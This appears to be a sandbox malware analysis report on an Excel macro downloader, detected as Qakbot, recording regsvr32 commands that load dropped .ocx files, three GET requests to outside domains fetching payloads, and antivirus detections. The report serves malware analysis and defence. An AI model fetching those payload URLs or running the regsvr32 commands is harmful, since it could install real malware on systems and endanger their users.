Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 13, 2022, 12:10 p.m. | April 13, 2022, 12:14 p.m. |
-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\E-1253417553.xlsb
2176-
regsvr32.exe regsvr32 /s C:\..\\Yhdthd.ocx
2356 -
regsvr32.exe regsvr32 /s C:\..\\Yhdthd1.ocx
2424 -
regsvr32.exe regsvr32 /s C:\..\\Yhdthd2.ocx
2460
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ateliecordefeltro.com | 50.116.87.139 | |
lojaalamar.com.br | 192.185.216.64 | |
amalalhamed.com | 162.215.248.83 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
request | GET http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat |
request | GET http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat |
request | GET http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat |
file | Yhdthd2.ocx |
file | Yhdthd.ocx |
file | Yhdthd1.ocx |
cmdline | regsvr32 /s C:\..\\Yhdthd.ocx |
cmdline | regsvr32 /s C:\..\\Yhdthd1.ocx |
cmdline | regsvr32 /s C:\..\\Yhdthd2.ocx |
Sangfor | Malware.Generic-XLM.Save.ma35 |
Cyren | XF/SneakyBin.E.gen!Eldorado |
Avast | VBS:Malware-gen |
Kaspersky | HEUR:Trojan.MSOffice.Generic |
Tencent | Trojan.MsOffice.Macro40.11003135 |
McAfee-GW-Edition | X97M/Downloader.lf |
GData | Macro.Trojan-Downloader.Agent.BDH |
Microsoft | TrojanDownloader:O97M/Qakbot.Y!MTB |
ZoneAlarm | HEUR:Trojan.MSOffice.Generic |
McAfee | X97M/Downloader.lf |
Rising | Downloader.Agent/XLM!1.DD1F (CLASSIC) |
Ikarus | Trojan-Downloader.XLM.Agent |
Fortinet | MSExcel/Agent.BDH!tr |
AVG | VBS:Malware-gen |
parent_process | excel.exe | martian_process | regsvr32 /s C:\..\\Yhdthd.ocx | ||||||
parent_process | excel.exe | martian_process | regsvr32 /s C:\..\\Yhdthd1.ocx | ||||||
parent_process | excel.exe | martian_process | regsvr32 /s C:\..\\Yhdthd2.ocx |